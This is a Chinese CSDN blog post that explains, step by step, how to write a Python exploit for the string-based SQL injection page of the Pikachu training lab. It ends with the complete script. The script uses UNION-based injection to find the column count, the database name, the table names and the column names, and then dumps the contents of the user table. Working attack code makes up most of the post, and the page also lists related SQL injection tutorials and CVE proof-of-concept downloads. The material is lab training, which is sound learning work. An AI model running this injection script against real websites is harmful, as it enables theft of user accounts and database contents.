day2 poc与exp学习之pikachu字符注入

最新推荐文章于 2024-01-03 19:45:15 发布
最新推荐文章于 2024-01-03 19:45:15 发布
阅读量305 收藏
点赞数 1
文章标签: 学习 数据库 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68074153/article/details/125912890
版权

exp编写

这里以基于联合注入的exp为例子

1. 全局变量

对数据存储以及http包头的自定义

url = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php"  # 要验证注入点的url
payload = "' union select 1"  # 初始payload
db = ""  # 存储数据库名
tb = []  # 存储表名
cb = []  # 存储列名
user = []  # 存储查询的user表内容
head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "}  # 自定义http包头

2.猜字段数

通过循环增加字段的数量发包,根据返回包正则匹配判断是否找到字段数

def column(column_num=""):  # 猜字段数
    for i in range(len(column_num)):  # 猜列数
        for j in range(i + 1): # 循环增加字段数量
            column_num += "," + str(j + 2)
        sqlname = {"name": column_num + "#", "submit": "查询"}  # 注入参数
        res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
        if not re.findall("The used SELECT statements have a different number of columns", res.text): # 返回包匹配是否猜到字段数,并退出循环
            print("字段数:", j + 2)
            print("payload:" + column_num + "#")
            global payload
            payload = column_num
            break

在这里插入图片描述

3.查询当前数据库名字

通过查询database(),得到数据库名

def database_name(payload_database=""):  # 联合查询数据库名
    payload_database = payload_database.replace("1", "database()", 1) # 将第一个查询的字段更改为我们需要查询的数据库名
    sqlname = {"name": payload_database + "#", "submit": "查询"}  # 注入参数
    res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
    dbname = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配查询到的数据库名
    global db
    db = dbname[0]  # 将查询到的数据库名存储到全局变量db
    print("数据库:" + db)
    print("payload:" + payload_database + "#") # 当前使用的payload

在这里插入图片描述

4. 查询表名

通过mysql的information_schema表来获得数据库里所有的表名。

在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。具体有关information_schema表参考https://wenku.baidu.com/view/f00d66346ddb6f1aff00bed5b9f3f90f76c64d34.html

def table_name(payload_table=""):  # 联合查询表名
    payload_table = payload_table.replace("1","table_name") + " from information_schema.tables where table_schema=" + "\'" + db + "\'"
    sqlname = {"name": payload_table + "#", "submit": "查询"}  # 注入参数
    res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
    tb_name = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text)   # 返回包正则匹配提取表名
    print(db, "下的所有表名:", tb_name)
    global tb   #将表名存储到全局变量tb
    tb = tb_name
    print("payload:" + payload_table + "#") # 当前使用的payload

在这里插入图片描述

5.查询user表的列名

这里只查询了user表作为实例,对代码稍作修改就可以查询更多表、

def column_user(payload_user=""): # 联合查询列名
    payload_user = payload_user.replace("1","column_name") + " from information_schema.columns where table_schema=" + "\'" + db + "\'" + " and table_name=" + "\'" + tb[3] + "\'"
    sqlname = {"name": payload_user + "#", "submit": "查询"}  # 注入参数
    res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
    cb_name = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配提取列名
    print(tb[3]+"表下的所有列:\n",cb_name)
    global cb #将列名存储到全局变量cb
    cb = cb_name

在这里插入图片描述

6.查询user表的内容

根据查询到的表名,列名查询user表的全部内容

def user_table(payload_usertable=""): #查询user表
    payload_usertable = payload_usertable + " from " + tb[3] #拼接查询表名
    for i in range(len(cb)): #循环查询每一列
        payload_user_table = payload_usertable.replace("1", cb[i]) or payload_usertable.replace(cb[i - 1], cb[i]) #替换列名查询
        sqlname = {"name": payload_user_table + "#", "submit": "查询"}  # 注入参数
        res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
        user_1 = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text) # 返回包正则匹配提取查询的的内容
        global user #将内容存储到全局变量user中
        user.append(user_1)

7.输出查询到的user表内容

if __name__ == '__main__':
    column(payload)
    database_name(payload)
    table_name(payload)
    column_user(payload)
    user_table(payload)
    for i in range(len(cb)):
        print(cb[i], ":", user[i])

在这里插入图片描述

8.完整exp

import re

import requests

url = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php"  # 要验证注入点的url
payload = "' union select 1"  # 初始payload
db = ""  # 存储数据库名
tb = []  # 存储表名
cb = []  # 存储列名
user = []  # 存储查询的user表内容
head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "}  # 自定义http包头


def column(column_num=""):  # 猜字段数
    for i in range(len(column_num)):  # 猜列数
        for j in range(i + 1):  # 循环增加字段数量
            column_num += "," + str(j + 2)
        sqlname = {"name": column_num + "#", "submit": "查询"}  # 注入参数
        res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
        if not re.findall("The used SELECT statements have a different number of columns",res.text):  # 返回包匹配是否猜到字段数,并退出循环
            # print("字段数:", j + 2)
            # print("payload:" + column_num + "#")
            global payload
            payload = column_num
            break


def database_name(payload_database=""):  # 联合查询数据库名
    payload_database = payload_database.replace("1", "database()", 1)  # 将第一个查询的字段更改为我们需要查询的数据库名
    sqlname = {"name": payload_database + "#", "submit": "查询"}  # 注入参数
    res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
    dbname = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text)  # 返回包正则匹配查询到的数据库名
    global db
    db = dbname[0]  # 将查询到的数据库名存储到全局变量db
    # print("数据库:" + db)
    # print("payload:" + payload_database + "#") # 当前使用的payload


def table_name(payload_table=""):  # 联合查询表名
    payload_table = payload_table.replace("1","table_name") + " from information_schema.tables where table_schema=" + "\'" + db + "\'"
    sqlname = {"name": payload_table + "#", "submit": "查询"}  # 注入参数
    res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
    tb_name = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text)  # 返回包正则匹配提取表名
    # print(db, "下的所有表名:", tb_name)
    global tb  # 将表名存储到全局变量tb
    tb = tb_name
    # print("payload:" + payload_table + "#") # 当前使用的payload


def column_user(payload_user=""):  # 联合查询列名
    payload_user = payload_user.replace("1","column_name") + " from information_schema.columns where table_schema=" + "\'" + db + "\'" + " and table_name=" + "\'" + tb[3] + "\'"
    sqlname = {"name": payload_user + "#", "submit": "查询"}  # 注入参数
    res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
    cb_name = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text)  # 返回包正则匹配提取列名
    # print(tb[3]+"表下的所有列:\n",cb_name)
    global cb  # 将列名存储到全局变量cb
    cb = cb_name


def user_table(payload_usertable=""):  # 查询user表
    payload_usertable = payload_usertable + " from " + tb[3]  # 拼接查询表名
    for i in range(len(cb)):  # 循环查询每一列
        payload_user_table = payload_usertable.replace("1", cb[i]) or payload_usertable.replace(cb[i - 1],cb[i])  # 替换列名查询
        sqlname = {"name": payload_user_table + "#", "submit": "查询"}  # 注入参数
        res = requests.get(url=url, headers=head, params=sqlname)  # 发起get请求
        user_1 = re.findall("<p class='notice'>your uid:(.+?) <br />", res.text)  # 返回包正则匹配提取查询的的内容
        global user  # 将内容存储到全局变量user中
        user.append(user_1)


if __name__ == '__main__':
    column(payload)
    database_name(payload)
    table_name(payload)
    column_user(payload)
    user_table(payload)
    for i in range(len(cb)):
        print(cb[i], ":", user[i])

    # print(db)
    # print(tb)
    # print(cb)
    # print(user)
SheepLeeeee
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SQL注入字符注入练习(pikachu
windStudyer的专栏
04-17 3698
SQL注入字符型 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类型 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类型 从上可以看出,请求的方法为get类型,注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符型。 判断注入点 从2.1知道请求方法和注入类型,因为是字符..
Vulnerabilities:漏洞PoCExp收集; Vulnerabilities PoC & Exp collections
05-25
针对Windows的PoC很多会被杀毒软件拦截,此为正常现象,请自行斟酌是否下载,如果有带有后门的exp,请通过提交issue联系我。 Windows Microsoft Windows SMB远程代码执行漏洞(永恒之蓝) Microsoft IIS 6.0 远程...
pikachu字符注入
m0_58887624的博客
11-09 1712
1.字符注入吧。直接就 1' 报错了 2.存在字符注入 3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据 4. 确定一下字段的显示位置嘛。 1' union select 1,2# 5.查一下数据库名 1' union select database(),version()# /**数据库名和版本**/ 只有数据库5.0以上的版本,才会存在i...
Pikachu数字型注入字符注入通关详解
小小小屿屿屿的博客
11-16 438
pikachu是一个漏洞练习平台,里面包含了大部分常见的Web漏洞,非常适合新手去联系,本文将详细讲述Pikachu靶场中的数字型注入字符注入这2关的攻略。
一文了解pikachu的SQL注入
allintao的博客
03-01 2531
本文章主要讲解关于pikachu注入方式。目录一、数字型注入(post)二、字符注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 4740
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
POC&EXP编写指南.rar
02-11
POC&EXP编写指南 详细讲述了POC&EXP的编写方式,很实用
2个chrome 0day poc
04-20
2个chrome 0day poc
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
POC or EXP
02-09
收集的POCEXP
SQL注入漏洞攻防攻略大全
12-30
SQL注入漏洞攻防攻略大全 目录 SQL注入漏洞攻防攻略大全 1 (一) SQL注入漏洞全接触--入门篇 1 (二) SQL注入法攻击一日通 9 (三) SQL Server应用程序中的高级SQL注入 19 (四) 跨站式SQL注入技巧 25 (五) 编写通用的ASP防SQL注入攻击程序 28 (六) SQL注入攻击的原理及其防范措施 30 (七) 利用instr()函数防止SQL注入攻击 34
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2027
Pikachu-----Sql Inject(SQL注入
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2575
sql注入
Pikachu--字符注入(get)
最新发布
XiaoYeZhu_1314的博客
01-03 488
1' union select 1,database() # 当前数据库。输入 1' and '1'='1 正确结果 判断为字符注入。发现1和2的位置都可以正确回显,1,2地方使用联合注入。输入vince' order by 1# 返回正确。输入vince' order by 2# 返回正确。输入1' and '1'='2 错误结果。输入 vince' order by 3#解密为:123456。解密为:000000。解密为:abc123。
pikachu 字符型SQL注入
m0_61903602的博客
10-25 542
pikachu 靶场 sql 字符
pikachu靶场的字符注入(get)
ranioe的博客
12-08 3476
pikachu靶场字符注入(get) 字符注入 先找一个可以正确返回的内容 判断闭合条件 查询vince’报错 查询vince”没有报错 则说明是使用’闭合的。 把vince’构造可满足放回正确内容的语句 把vince’构造可满足放回正确内容的语句,在这个过程中可以利用and 1=1 和and 1=2 去判断是否构造成功 and 1=1 返回正常,and 1=2 查询不到用户。则说明构造成功了 查询字段数 查字段是否为2时,没有报错,查字段数是否为3时,报错。则说明字段数为2 查询回显位 语
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 6195
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入点(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
pikachu平台SQL注入
m0_46684679的博客
12-01 913
pikachu平台SQL部分速通
重现pikachu sql数字型字符注入(作业)
qq_43473164的博客
03-24 1012
重现pikachu sql数字型字符注入 本周对于sql注入有了一定的了解,我亲自在pikachu上进行了实验,以下为我的实验内容 sql数字型注入 连接数据库,这里我直接使用phpstudy集成环境. 输入 select * username,email from member where id = 1 or 1 = 1 效果如下 很明显,条件恒为真,遍历出所有username 和 emai...
漏洞细节、pocexp 已在互联网上流传
12-16
漏洞细节、POC(Proof of Concept)以及EXPExploit)是指揭示和证明系统中存在的漏洞的详细信息、漏洞利用和利用脚本。这些信息通常是研究人员或黑客根据自己的研究和测试发现的,并在互联网上公开分享。 泄露...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值